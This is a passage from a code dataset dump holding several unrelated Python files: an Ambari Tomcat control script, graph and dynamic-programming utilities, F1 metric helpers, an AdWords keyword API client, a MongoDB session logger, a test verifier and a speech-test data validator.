\"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\n\"\"\"\n\nimport sys\nfrom resource_management import *\n\nclass Tomcat(Script):\n def install(self, env):\n self.install_packages(env)\n pass\n\n def configure(self, env):\n import params\n env.set_params(params)\n\n def start(self, env):\n import params\n self.configure(env)\n tomcat_pid = format('{app_root}/catalina.pid')\n process_cmd = format('env JAVA_HOME={java64_home} CATALINA_PID=' + tomcat_pid + ' {app_root}/apache-tomcat-*/bin/catalina.sh start')\n\n Execute(process_cmd,\n logoutput=False,\n wait_for_finish=True,\n pid_file=tomcat_pid,\n poll_after = 15\n )\n\n def stop(self, env):\n import params\n self.configure(env)\n tomcat_pid = format('{app_root}/catalina.pid')\n process_cmd = format('env JAVA_HOME={java64_home} CATALINA_PID=' + tomcat_pid + ' {app_root}/apache-tomcat-*/bin/catalina.sh stop')\n\n Execute(process_cmd,\n logoutput=True,\n wait_for_finish=True,\n pid_file=tomcat_pid,\n poll_after = 15\n )\n\n def status(self, env):\n import params\n self.configure(env)\n tomcat_pid = format('{app_root}/catalina.pid')\n check_process_status(tomcat_pid)\n\nif __name__ == \"__main__\":\n Tomcat().execute()\n","sub_path":"package/scripts/tomcat.py","file_name":"tomcat.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"289038230","text":"'''\r\nCreated on Jun 30, 2017\r\n\r\n@author: Rawad\r\n'''\r\n\r\nclass Graph:\r\n\t'''\r\n\tUses an adjacency list representation to represent an undirected graph.\r\n\t'''\r\n\t\r\n\tdef __init__(self):\r\n\t\tself.graph = {}\r\n\t\r\n\tdef addGroup(self, a, b):\r\n\t\t\r\n\t\tif not a in self.graph:\r\n\t\t\tself.graph[a] = []\r\n\t\t\r\n\t\tif not b in self.graph:\r\n\t\t\tself.graph[b] = []\r\n\t\t\r\n\t\tif not a in self.graph[b]:\r\n\t\t\tself.graph[b].append(a)\r\n\t\t\r\n\t\tif not b in self.graph[a]:\r\n\t\t\tself.graph[a].append(b)\r\n\t\r\n\tdef __len__(self):\r\n\t\treturn len(self.graph)\r\n\t\r\n\tdef isCyclic(self):\r\n\t\t\r\n\t\tvisited = {i: False for i in self.graph}\r\n\t\t\r\n\t\tfor v in self.graph:\r\n\t\t\tif not visited[v]:\r\n\t\t\t\tif self.isCyclicUtil(visited, v, -1):\r\n\t\t\t\t\treturn True\r\n\t\t\t\t\r\n\t\t\r\n\t\treturn False\r\n\t\r\n\tdef isCyclicUtil(self, visited, v, parent):\r\n\t\t\r\n\t\tvisited[v] = True\r\n\t\t\r\n\t\tfor u in self.graph[v]:\r\n\t\t\tif not visited[u]:\r\n\t\t\t\tif self.isCyclicUtil(visited, u, v):\r\n\t\t\t\t\treturn True\r\n\t\t\telif parent != u:\r\n\t\t\t\treturn True\r\n\t\t\t\t\r\n\t\treturn False\r\n\t\r\n\tdef getConnectedComponents(self):\r\n\t\t'''\r\n\t\tReturns list of graphs, each representing a connected component cotnained in this original graph.\r\n\t\t'''\r\n\t\t\r\n\t\tvisited = {i: False for i in self.graph}\r\n\t\t\r\n\t\tgraphs = []\r\n\t\t\r\n\t\tfor v in self.graph:\r\n\t\t\tif not visited[v]:\r\n\t\t\t\tgraph = Graph()\r\n\t\t\t\tgraphs.append(graph)\r\n\t\t\t\tself.connectedComponentsUtil(v, visited, graph)\r\n\t\t\r\n\t\treturn graphs\r\n\t\r\n\tdef connectedComponentsUtil(self, v, visited, graph):\r\n\t\t\r\n\t\tvisited[v] = True\r\n\t\t\r\n\t\tfor u in self.graph[v]:\r\n\t\t\tif not visited[u]:\r\n\t\t\t\tgraph.addGroup(v, u)\r\n\t\t\t\tself.connectedComponentsUtil(u, visited, graph)\r\n","sub_path":"loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"452717876","text":"\"\"\"\nGiven an unsorted array of integers, find the length of longest increasing subsequence.\n\nExample:\nInput: [10,9,2,5,3,7,101,18]\nOutput: 4 \nExplanation: The longest increasing subsequence is [2,3,7,101], therefore the length is 4. \nNote:\n\nThere may be more than one LIS combination, it is only necessary for you to return the length.\nYour algorithm should run in O(n2) complexity.\n\"\"\"\nclass Solution(object):\n def lengthOfLIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n n = len(nums)\n \n if n == 0:\n return n\n\n maxLen = 1\n DP = [1 for i in range(n)]\n \n\n for i in range(1, n):\n for j in range(i):\n if nums[j] < nums[i]:\n DP[i] = max(DP[j] + 1, DP[i])\n maxLen = max(DP[i], maxLen)\n return maxLen\n\n\"\"\"\nExplanation\n\nif nums is empty, then the longest increase subsequence is 0, otherwise it's 1 initially (i.e. 1 character)\n\nWe use an array of length n filled with 1's since the longest increasing subsequence of a single character is 1.\n\nThis question is essnetially asking what's the largest sequence of numbers such that they're sorted.\n\nFor each element, we loop through all prior elements and check them against the current element we're on.\nIf the prior element is less than the current, the longest increasing subsequence is the max between the longest increasing\nsubsequence at that point at j + 1 or the current index.\n\nWe use a variable to track the maxLen which updates whenever we update DP[i] and we return maxLen at the end\n\n\n\n\"\"\"","sub_path":"Dynamic Programming/300_longest_increasing_subsequence.py","file_name":"300_longest_increasing_subsequence.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"365871157","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 3 12:55:15 2019\n\n@author: krzysztofwielocha\n\"\"\"\n\nimport numpy as np\n\ndef diff(A): \n B1=(A[1:-2,1:-2]>A[0:-3,1:-2])\n B2=(A[1:-2,1:-2]>A[2:-1,1:-2])\n B3=(A[1:-2,1:-2]>A[1:-2,0:-3])\n B4=(A[1:-2,1:-2]>A[1:-2,2:-1])\n \n B=B1*B2*B3*B4\n \n B=B*(A[1:-2,1:-2]>3)\n \n C= np.zeros((256,256))\n \n C[1:-2,1:-2]=B\n \n return C\n\ndef locs(Tp,Tv):\n P = []\n Q = []\n cp = []\n cq = []\n for i in range(len(Tp)):\n P.append(diff(Tp[i].reshape((256,256))))\n cp.append(np.where(P[i]))\n Q.append(diff(Tv[i].reshape((256,256))))\n cq.append(np.where(Q[i]))\n \n \n return np.array(P),np.array(Q), cp, cq\n\ndef precc(yp,yt):\n tp = 0\n tn = 0\n for i in range(len(yp)):\n \n if len(yp[i][0]) == len(yt[i][0]) and len(yp[i][1]) == len(yt[i][1]):\n tp += len(yp[i][0])\n# print(i)\n \n elif (len(yp[i][0]) > len(yt[i][0])) and (len(yp[i][1]) > len(yt[i][1])):\n tp += len(yp[i][0])\n tn += np.abs(len(yp[i][0]) - len(yt[i][0]))\n# print(i ,' dupa! ',fn,' ', np.abs(len(yp[i][0]) - len(yt[i][0])))\n else: continue\n# print(tp,' ',fn)\n prec = tp/(tp+tn)\n return prec\n\ndef recc(yp,yt):\n tp = 0\n fn = 0\n for i in range(len(yp)):\n \n if len(yp[i][0]) == len(yt[i][0]) and len(yp[i][1]) == len(yt[i][1]):\n tp += len(yp[i][0])\n# print(i)\n \n elif (len(yp[i][0]) < len(yt[i][0])) and (len(yp[i][1]) < len(yt[i][1])):\n tp += len(yp[i][0])\n fn += np.abs(len(yp[i][0]) - len(yt[i][0]))\n# print(i ,' dupa! ',fn,' ', np.abs(len(yp[i][0]) - len(yt[i][0])))\n else: continue\n# print(tp,' ',fn)\n rec = tp/(tp+fn)\n return rec\n\ndef ff1(yp,yt):\n precision = precc(yp, yt)\n recall = recc(yp, yt)\n return 2*((precision*recall)/(precision+recall))","sub_path":"funky_f1.py","file_name":"funky_f1.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"219430276","text":"from googleads import adwords\nimport os\n\n#Requires a .yaml file from the adwords developers section before it will work \nyaml_loc = os.path.join(os.getcwd(), \"server\", \"Apps\", \"SearchLens\", \"modules\", \"googleads.yaml\")\n\nPAGE_SIZE = 500\nattributeList = ['KEYWORD_TEXT', 'SEARCH_VOLUME', 'CATEGORY_PRODUCTS_AND_SERVICES', 'COMPETITION', 'AVERAGE_CPC', 'TARGETED_MONTHLY_SEARCHES']\n\ndef build_selector(ideaType, requestType, queryList, attributeList = attributeList, offset = 0, PAGE_SIZE = PAGE_SIZE,\n network = None, language_id = None, location_id = None, ad_group_id = None):\n \"\"\"\n Returns a selector used by the TargetingIdeaService to get keywords related to query.\n\n Parameters:\n\n ideaType: String. \n requestType: String.\n attributeList: String List.\n queryList: String list of the words used to get suggestions from.\n offset: Int.\n PAGE_SIZE: Int. How many results to pull down at once.\n network (optional setting): Dictionary. Should be filled out in this example format:\n\n 'targetGoogleSearch' : True,\n 'targetSearchNetwork' : False,\n 'targetContentNetwork' : False,\n 'targetPartnerSearchNetwork' : False\n\n language_id (optional setting): String. IDs can be found in google documentation here https://developers.google.com/adwords/api/docs/appendix/languagecodes.\n ad_group_id (optional setting): String. Used to set SearchAdGroupID parameter.\n\n \"\"\"\n selector = {\n 'ideaType' : ideaType,\n 'requestType' : requestType\n }\n\n selector['requestedAttributeTypes'] = attributeList\n\n selector['paging'] ={\n 'startIndex' : str(offset),\n 'numberResults' : str(PAGE_SIZE)\n }\n\n selector['searchParameters'] = [{\n 'xsi_type' : 'RelatedToQuerySearchParameter', #This could be changed to allow a more abstract method\n 'queries' : queryList\n }]\n\n if network:\n selector['searchParameters'].append({\n 'xsi_type' : 'NetworkSearchParameter',\n 'networkSetting' : network\n })\n\n if language_id:\n selector['searchParameters'].append({\n 'xsi_type' : 'LanguageSearchParameter',\n 'languages' : [{'id' : language_id}] #TODO: Update to reflect that multiple languages can be taken\n })\n\n if ad_group_id:\n selector['searchParameters'].append({\n 'xsi_type' : 'SeedAdGroupIdSearchParameter',\n 'adGroupId' : ad_group_id\n })\n\n if location_id:\n selector['searchParameters'].append({\n 'xsi_type' : 'LocationSearchParameter',\n 'locations' : [{'id' : location_id}]\n })\n\n return selector\n\ndef get_keyword_data(selector, targeting_service, offset = 0, PAGE_SIZE = PAGE_SIZE, exclusion_list = [], parent_keyword = None):\n \"\"\"\n Returns a dictionary of the format Keyword : Category Int, Search Volume, Competition, Average cost per click, Monthly Searches, Parent Keyword\n\n Parameters:\n\n selector: A selector dictionary. Available from build_selector.\n targeting_service: An adwords client method. (client.GetService('TargetingIdeaService'))\n offset: Int. Used for paging.\n PAGE_SIZE: Int. How many results are pulled back at once.\n \"\"\"\n more_pages = True\n keyword_data = {}\n\n while more_pages:\n page = targeting_service.get(selector)\n\n if 'entries' in page:\n for result in page['entries']:\n attributes = {}\n for trait in result['data']:\n attributes[trait['key']] = getattr(trait['value'], 'value', '0')\n\n if attributes['KEYWORD_TEXT'] not in exclusion_list:\n keyword_data[attributes['KEYWORD_TEXT']] = {\"Category\" : attributes['CATEGORY_PRODUCTS_AND_SERVICES'],\"Search Volume\" : attributes['SEARCH_VOLUME'],\n \"Competition\" : attributes['COMPETITION'], \"CPC\" : attributes['AVERAGE_CPC'], \"Monthly Searches\" : attributes['TARGETED_MONTHLY_SEARCHES']}\n\n if parent_keyword:\n keyword_data[attributes['KEYWORD_TEXT']]['Parent Keyword'] = [str(parent_keyword)]\n else:\n keyword_data[attributes['KEYWORD_TEXT']]['Parent Keyword'] = [str(attributes['KEYWORD_TEXT'])]\n\n offset += PAGE_SIZE\n selector['paging']['startIndex'] = str(offset)\n more_pages = offset < int(page['totalNumEntries'])\n\n return keyword_data\n\ndef keyword_suggestion_stats(queryList, network = None, language_id = None, location_id = None, ad_group_id = None, only_keyword_stats = False, exclusion_list = []):\n \"\"\"\n Initialises the adwords api client and returns a dictionary of keyword suggestions and their statistics.\n The stats_selector part is used to append the statistics of the keywords that the user inputs.\n\n Parameters:\n\n queryList: String List. A list of keywords to query.\n network (optional setting): Dictionary. Should be filled out in this example format:\n\n 'targetGoogleSearch' : True,\n 'targetSearchNetwork' : False,\n 'targetContentNetwork' : False,\n 'targetPartnerSearchNetwork' : False\n\n language_id (optional setting): String. IDs can be found in google documentation here https://developers.google.com/adwords/api/docs/appendix/languagecodes.\n ad_group_id (optional setting): String. Used to set SearchAdGroupID parameter.\n keyword_suggestions\n \"\"\"\n\n #-------------------------INVESTIGATE WHETHER THIS CAN BE CHANGED TO GENERATE CREDENTIALS BASED ON A USER LOGGING IN---------------------------#\n adwords_client = adwords.AdWordsClient.LoadFromStorage(yaml_loc)\n\n targeting_idea_service = adwords_client.GetService('TargetingIdeaService', version='v201809')\n stats_selector = build_selector(ideaType = 'KEYWORD', requestType = 'STATS', queryList = queryList, network = network, language_id = language_id, location_id = location_id)\n\n stats = get_keyword_data(selector = stats_selector, targeting_service = targeting_idea_service, exclusion_list = exclusion_list)\n\n if not only_keyword_stats:\n suggestion_selector = build_selector(ideaType = 'KEYWORD', requestType = 'IDEAS', queryList = queryList, network = network, language_id = language_id, location_id = location_id)\n suggestions = get_keyword_data(selector = suggestion_selector, targeting_service = targeting_idea_service, exclusion_list = exclusion_list, parent_keyword = queryList[0])\n keywords = {**stats, **suggestions}\n\n else:\n keywords = stats\n\n return keywords","sub_path":"server/Apps/SearchLens/modules/adwords/api_caller.py","file_name":"api_caller.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"168790157","text":"# -*- coding: utf-8 -*-\nimport pymongo\n\nfrom .db_event import DBEvent\nfrom ...settings import *\n\n\nclass DBMatch(DBEvent):\n \"\"\"Class responsible to control all the search of matches\n in the ```Events``` collection\"\"\"\n def select_events(self):\n \"\"\"Return all the Events in the collection\"\"\"\n return self.db_collection.find({}, {'_id': 0})\n\n def select_event_by_name(self, event_name=None):\n \"\"\"Return the event that have the specified name or return False\"\"\"\n return self.db_collection.find_one(\n {'name': event_name}, DB_FIELDS_RETURN\n )\n\n def select_event_by_sport(self, sport=None, ordering=None):\n \"\"\"Return a list of all the event with the sport name, if ordering\n specified order the result by this field\"\"\"\n events = None\n\n if ordering:\n events = self.db_collection.find(\n {'sport.name': sport}, DB_FIELDS_RETURN\n ).sort([(ordering, pymongo.ASCENDING)])\n else:\n events = self.db_collection.find(\n {'sport.name': sport}, DB_FIELDS_RETURN\n )\n\n return events\n","sub_path":"api_888_interview/api/src/database/db_match.py","file_name":"db_match.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"300953571","text":"#!/usr/bin/python2.7\nimport sys, re, time, os, zipfile, subprocess, collections\nfrom optparse import OptionParser\n\ndef main():\n\n usage='''%prog [opts] \n\n This tool will validate the specified DST file and parallel CSV and contact-TSV files\n when using the default options. If you are validating a test that does not have a CSV\n or contact/music/etc. per-user metadata, then you must specify this in the options.\n\n Assuming the default options, then logic is to first check for lmetsv file and \n validate that. If it is fine, the lme dir/grxml dir will not be checked. If you\n want to explicitly check the grxml dir, point to it with --lmedir\n\n Validation checks are\n DST: all audio files exist, are readable, are non-empty, and are valid zip files\n DST: all subfiles in the DST exist in the zip files\n DST: all samples rates are the same (don't mix 8k and 16k)\n CSV: user, nmaid, transcription, and fieldID columns exist and non-empty\n CDV: number of columns match for all lines\n LMEDir: grxml file exists for all users and is valid xml\n LMEDir: counts empty grxml files and average number of contacts\n LMETsv: contact columns are in correct order with correct names\n LMETsv: contacts entries are non-empty\n LMETsv: contacts for a user are all contiguous in the file (requirement for ACC)\n'''\n parser = OptionParser(usage=usage)\n parser.add_option('-c', '--csv', action=\"store\", help='use this CSV [default: find from dst]')\n parser.add_option('-g', '--lmedir', action=\"store\", help='use this dir with .grxml files [default: find from dst]')\n parser.add_option('-t', '--lmetsv', action=\"store\", help='use this file for user-specific data [default: find from dst]')\n parser.add_option('--nocsv', default=False, action=\"store_true\", help='do not check for a CSV')\n parser.add_option('--nolme', default=False, action=\"store_true\", help='do not check for lme dir/files')\n parser.add_option('-v', '--verbose', action=\"store_true\", help='print more info')\n opts, args = parser.parse_args()\n\n if len(args) != 1:\n sys.stderr.write(\"expecting one arguments but found %d\\n\" % len(args)); sys.exit(1)\n dstFile = args[0]\n if not dstFile.endswith('.dst'):\n sys.stderr.write(\" does not end with '.dst'. Exiting\\n\"); sys.exit(1)\n\n total_errors = total_warnings = 0\n global users; users = set()\n testname = os.path.basename(dstFile).split(\".\")[0]\n\n log(\"===========================================================\\nValidating DST: %s\\n\" % dstFile)\n if not os.path.isfile(dstFile): log(\"ERROR: %s does not exist or is not readable\\n\" % dstFile); total_errors += 1\n else: (e, w) = validate_DST(dstFile, opts.verbose); total_errors += e; total_warnings += w\n\n if not opts.nocsv:\n csvFile = opts.csv if opts.csv else re.sub('dst$','csv',dstFile)\n log(\"===========================================================\\nValidating CSV: %s\\n\" % csvFile)\n if not os.path.isfile(csvFile): log(\"ERROR: %s does not exist or is not readable\\n\" % csvFile); total_errors += 1\n else: (e, w) = validate_CSV(csvFile); total_errors += e; total_warnings += w\n\n if not opts.nolme:\n # first check lme tsv\n hasTsv=hasGrxml=True\n grxmlDir = opts.lmedir if opts.lmedir else dstFile.replace('/dstfiles/','/grxml/').replace('.utf8.dst','')\n tsvFile = opts.lmetsv if opts.lmetsv else os.path.join(grxmlDir, testname + '.utf8.tsv')\n log(\"===========================================================\\nValidating LME TSV: %s\\n\" % tsvFile)\n if not os.path.isfile(tsvFile): log(\"WARNING: %s does not exist or is not readable\\n\" % tsvFile); total_warnings += 1; hasTsv=False\n else: (e, w) = validate_TSV(tsvFile); total_errors += e; total_warnings += w\n\n # only check grxml dir if no TSV or user asks for it (via opts.lmedir)\n if not hasTsv or opts.lmedir:\n log(\"===========================================================\\nValidating LME/GRXML dir: %s\\n\" % grxmlDir)\n if not os.path.isdir(grxmlDir): log(\"WARNING: %s does not exist or is not readable\\n\" % grxmlDir); total_warnings += 1; hasGrxml=False\n else: (e, w) = validate_GRXML(grxmlDir); total_errors += e; total_warnings += w\n\n if not hasTsv and not hasGrxml:\n log(\"ERROR: no GRXML directory or TSV file\\n\"); total_errors += 1\n\n log(\"===========================================================\\n\")\n log(\"TOTAL ERRORS: %d\\n\" % total_errors)\n log(\"TOTAL WARNINGS: %d\\n\" % total_warnings)\n\n exit(total_errors > 0)\n\ndef log(str):\n sys.stdout.write(str)\n sys.stdout.flush()\n\ndef findDelim(text):\n nComma = len(re.findall(',',text))\n nTab = len(re.findall('\\t',text))\n if nComma == 0 and nTab == 0: return None\n if nComma > nTab: return ','\n return '\\t'\n\ndef validate_DST(fn, verbose):\n global users\n errors = warnings = 0\n path_re = re.compile(r'^PATH (\\S+)=(\\S+)/([^/]+)$')\n file_re = re.compile(r'^FILE (\\S+) . (\\S+) (\\S+) \\S+$')\n utt_re = re.compile(r'^(\\S+) [0-9\\.]+$')\n\n dst = open(fn)\n\n paths = []\n dst_utts = 0\n sample_rate_counts = collections.defaultdict(int)\n\n for line in dst.readlines():\n line = line.strip()\n if path_re.match(line):\n m = path_re.match(line)\n paths.append((m.group(1), m.group(2), m.group(3)))\n if file_re.match(line):\n m = file_re.match(line)\n user_zip_contents = {}\n audio_zip_name = None\n users.add(m.group(2))\n for path in paths:\n user_zip_name = os.path.join(path[1], m.group(1)+path[2])\n if not os.path.isfile(user_zip_name):\n sys.stdout.write(\"ERROR: %s not found\\n\" % user_zip_name); errors += 1\n elif ((os.path.getsize(user_zip_name) == 0) or (not os.access(user_zip_name, os.R_OK))):\n sys.stdout.write(\"ERROR: %s is empty or not readable\\n\" % user_zip_name); errors += 1\n elif not zipfile.is_zipfile(user_zip_name):\n sys.stdout.write(\"ERROR: %s is not a valid zip file\\n\" % user_zip_name); errors += 1\n elif path[2] == '.nwv.zip':\n try:\n user_zip = zipfile.ZipFile(user_zip_name)\n except:\n sys.stdout.write(\"ERROR: exception caught reading %s\\n\" % user_zip_name)\n errors += 1\n audio_zip_name = user_zip_name\n if utt_re.match(line):\n wav_fn = utt_re.match(line).group(1) + '.nwv'\n if audio_zip_name:\n audio_zip = zipfile.ZipFile(audio_zip_name)\n if wav_fn not in audio_zip.namelist():\n sys.stdout.write(\"ERROR: audio file %s not found in zip archive %s\\n\" % (wav_fn, audio_zip_name)); errors += 1\n else:\n nwv = audio_zip.open(wav_fn)\n sample_rate = None\n for line in nwv.readlines():\n if line.startswith('sample_rate'):\n sample_rate = int(line.split()[2])\n break\n if verbose and sample_rate != 16000:\n sys.stdout.write(\"SAMPLE RATE: file %s in archive %s has sample rate %d\\n\" % (wav_fn, audio_zip_name, sample_rate))\n sample_rate_counts[sample_rate] += 1\n dst_utts += 1\n\n sys.stdout.write(\"number speakers: %d\\n\" % len(users))\n sys.stdout.write(\"number utterances: %d\\n\" % dst_utts)\n for s in sample_rate_counts.keys():\n num = sample_rate_counts[s]\n pct = 100.0 * sample_rate_counts[s]/dst_utts\n sys.stdout.write(\"\\t%d at %d Hz (%.2f%%)\\n\" % (num, s, pct))\n if len(sample_rate_counts.keys()) > 1:\n sys.stdout.write(\"ERROR: multiple sample rates in test\"); errors += 1\n if not verbose: sys.stdout.write(\". Run with -v for list of non-16kHz audio zips\")\n sys.stdout.write('\\n')\n sys.stdout.write(\"\\n\")\n sys.stdout.write(\"DST validation complete with %d errors and %d warnings\\n\" % (errors, warnings))\n sys.stdout.flush()\n return (errors, warnings)\n\ndef validate_CSV(fn):\n errors = warnings = 0\n\n csvData=open(fn).readlines()\n\n delim = findDelim(csvData[0])\n cols = csvData[0].split(delim)\n indexMap = {}\n for i,val in enumerate(cols):\n indexMap[val]=i\n\n for reqCol in ['user','nmaid','transcription']:\n if reqCol not in indexMap: sys.stdout.write(\"ERROR: column '%s' not found in CSV\\n\" % reqCol); errors += 1\n if 'fieldID' not in indexMap and 'fieldId' not in indexMap and 'field_id' not in indexMap:\n sys.stdout.write(\"ERROR: column 'fieldId' or 'field_id' not found in CSV\\n\"); errors += 1\n\n # the header value changes in different files\n fieldIdHeader = 'fieldId'\n if 'field_id' in indexMap: fieldIdHeader = 'field_id'\n if 'fieldID' in indexMap: fieldIdHeader = 'fieldID'\n\n nCsvLines = len(csvData)-1\n blankFieldId = contactUtts = 0\n userCounts = collections.defaultdict(int)\n nmaidCounts = collections.defaultdict(int)\n\n # iterate over non-header lines in the CSV\n for line in csvData[1:]:\n toks = line.split(delim)\n if len(toks) != len(indexMap):\n sys.stdout.write(\"WARNING: number of columns don't match in line '%s'\\n\" % line); warnings += 1\n continue\n\n # count blank fieldId values ... we don't want any in SVoice, DMA or Genie\n if toks[indexMap[fieldIdHeader]].strip() == '': blankFieldId += 1\n\n user = toks[indexMap['user']]\n userCounts[user] += 1\n\n nmaid = toks[indexMap['nmaid']]\n nmaidCounts[nmaid] += 1\n\n trans = toks[indexMap['transcription']]\n if '\\\\contact' in trans: contactUtts += 1\n\n sys.stdout.write(\"number speakers: %d\\n\" % len(userCounts))\n sys.stdout.write(\"number utterances: %d\\n\" % nCsvLines)\n sys.stdout.write(\"fieldID column header: %s\\n\" % fieldIdHeader)\n sys.stdout.write(\"number empty fieldID values: %d (%0.1f%%)\\n\" % (blankFieldId, float(blankFieldId)/nCsvLines*100))\n sys.stdout.write(\"utterances with \\\\contact: %d (%0.1f%%)\\n\" % (contactUtts, float(contactUtts)/nCsvLines*100))\n sys.stdout.write(\"speakers with most utterances:\\n\")\n for count,user in countDictToList(userCounts)[:10]:\n sys.stdout.write(\"\\t%d\\t%0.1f%%\\t%s\\n\" % (count, float(count)/nCsvLines*100, user))\n sys.stdout.write(\"NMAID distribution:\\n\")\n for count,nmaid in countDictToList(nmaidCounts):\n sys.stdout.write(\"\\t%d\\t%0.1f%%\\t%s\\n\" % (count, float(count)/nCsvLines*100, nmaid))\n\n # also run ACC perfReport script that can validate CSV files\n # os.system('python /amr/tools/acc/mrec26.100/16070/moduleScripts/perfReports.py --verify '+csvFile)\n # this script doesn't handle encodings/wide chars well and mistakenly thinks fields are missing/added...\n\n sys.stdout.write(\"\\nCSV validation complete with %d errors and %d warnings\\n\" % (errors, warnings))\n sys.stdout.flush()\n return (errors, warnings)\n\ndef validate_GRXML(dir):\n global users\n errors = warnings = 0\n contact_re = re.compile(r'CONTACT_NAME=\"')\n\n missingGrxml = emptyGrxml = totalContacts = 0\n for user in users:\n grxml = \"%s/%s.grxml\" % (dir, user)\n if os.path.isfile(grxml):\n nContacts = 0\n for line in open(grxml):\n if contact_re.search(line):\n nContacts += 1\n if nContacts == 0: emptyGrxml += 1\n totalContacts += nContacts\n if os.path.getsize(grxml) == 0:\n sys.stdout.write(\"ERROR: %s has length 0\\n\" % grxml); errors += 1\n else:\n sys.stdout.write(\"ERROR: grxml not found: %s\\n\" % grxml); errors += 1\n missingGrxml += 1\n\n sys.stdout.write(\"number missing grxml files: %d (%0.1f%%)\\n\" % (missingGrxml, float(missingGrxml)/len(users)*100))\n sys.stdout.write(\"number empty grxml files: %d (%0.1f%%)\\n\" % (emptyGrxml, float(emptyGrxml)/len(users)*100))\n nNotEmpty = len(users) - missingGrxml - emptyGrxml\n avg=0\n if nNotEmpty > 0: avg=float(totalContacts) / nNotEmpty\n sys.stdout.write(\"average contacts per non-empty-grxml user: %0.1f\\n\" % avg)\n\n sys.stdout.write(\"\\nGRXML validation complete with %d errors and %d warnings\\n\" % (errors, warnings))\n sys.stdout.flush()\n return (errors, warnings)\n\ndef validate_TSV(fn):\n global users\n errors = warnings = 0\n\n f = open(fn)\n header = f.readline().strip().split('\\t')\n if not ('user' in header and 'content_type' in header and 'content' in header):\n sys.stdout.write(\"ERROR: %s missing header or does not contain user, content, and content_type columns\\n\" % fn); errors += 1; return (errors, warnings)\n line_num = 0\n\n last_user = None\n user_contact_counts = collections.defaultdict(int)\n while True:\n line = f.readline()\n if not line: break\n line_num += 1\n if line.strip() == '': continue\n\n data = dict(zip(header, line.strip().split('\\t')))\n\n if data['user'] != last_user:\n if data['user'] in user_contact_counts: sys.stdout.write(\"ERROR: non-contiguous entries for user %s\\n\" % data['user']); errors += 1\n last_user = data['user']\n\n if data['content_type'] == 'contacts': user_contact_counts[data['user']] += 1\n\n if data['content_type'] == 'contacts' and data['content'] == '{}':\n sys.stdout.write(\"ERROR: empty contacts content field for user %s at line %d\\n\" % (data['user'], line_num)); errors += 1\n\n num_no_contacts = 0\n total_contacts = 0\n for user in users:\n if user_contact_counts[user] == 0:\n # sys.stdout.write(\"WARNING: no contact lines in TSV for user %s\\n\" % user); warnings += 1\n num_no_contacts += 1\n else:\n total_contacts += user_contact_counts[user]\n\n avg = 0.0 if len(users) == num_no_contacts else float(total_contacts)/(len(users) - num_no_contacts)\n sys.stdout.write(\"number of users with no contact lines in TSV: %d\\n\" % num_no_contacts)\n sys.stdout.write(\"average contacts per non-empty user: %0.1f\\n\" % avg)\n\n sys.stdout.write(\"\\nTSV validation complete with %d errors and %d warnings\\n\" % (errors, warnings))\n sys.stdout.flush()\n return (errors, warnings)\n\ndef countDictToList(d):\n dList=[(count,val) for val,count in d.items()]\n dList.sort(reverse=True)\n return dList\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/scripts/validateTest.py","file_name":"validateTest.py","file_ext":"py","file_size_in_byte":14646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"307984864","text":"from model.mongodb import conn_mongodb\nfrom datetime import datetime\n\nclass BlogSession():\n blog_page = {'A':'indexA.html', 'B':'indexB.html'}\n session_count = 0\n\n @staticmethod #접속에 관한 정보 저장\n def save_session_info(session_ip, user_email, webpage_name):\n now = datetime.now()\n now_time = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n mongo_db = conn_mongodb()\n mongo_db.insert_one({\n 'session_ip':session_ip\n ,'user_email':user_email\n ,'page':webpage_name\n ,'access_time':now_time\n })\n # session_ip / user_email / page / access_time\n\n @staticmethod #인자 넣기 (force=None)\n def get_blog_page(blog_id=None):\n if blog_id == None:\n if BlogSession.session_count == 0:\n BlogSession.session_count = 1\n return BlogSession.blog_page['A']\n else:\n BlogSession.session_count = 0\n return BlogSession.blog_page['B']\n else:\n return BlogSession.blog_page[blog_id]\n","sub_path":"flask_project/project_abtest/control/session_manage.py","file_name":"session_manage.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"103090111","text":"import os\nimport subprocess\nimport string\nimport time\nimport pytest\n\n\n\ndef is_in(parentlist, sublist):\n parentlist = parentlist.replace(\" \",\"\")\n sublist = sublist.replace(\" \",\"\")\n return sublist in parentlist\n\nif __name__ == \"__main__\":\n wrong = 0\n start_time = time.time()\n flag = False\n for i in range(12):\n try:\n ans_f = open('ans%d.txt'%i)\n ans = ans_f.read()\n result = subprocess.check_output('python nonogram.py test%d.txt'%i, shell=True)\n if not is_in(result,ans):\n wrong = wrong + 1\n except:\n wrong = wrong + 1\n if (wrong == 0):\n flag = True\nprint(\"[PYGGI_RESULT] {runtime: %f,pass_all: %s}\"%(time.time() - start_time,flag))\n#print(\"[PYGGI_RESULT] {runtime: \"+str(run_time)+)","sub_path":"pyggi_hj/example/verifier_2.py","file_name":"verifier_2.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"20678857","text":"\"\"\"Create the input data pipeline using `tf` and `np`\"\"\"\nimport sys\n\nsys.path.extend(['..'])\n\nimport pickle\n\nimport tensorflow as 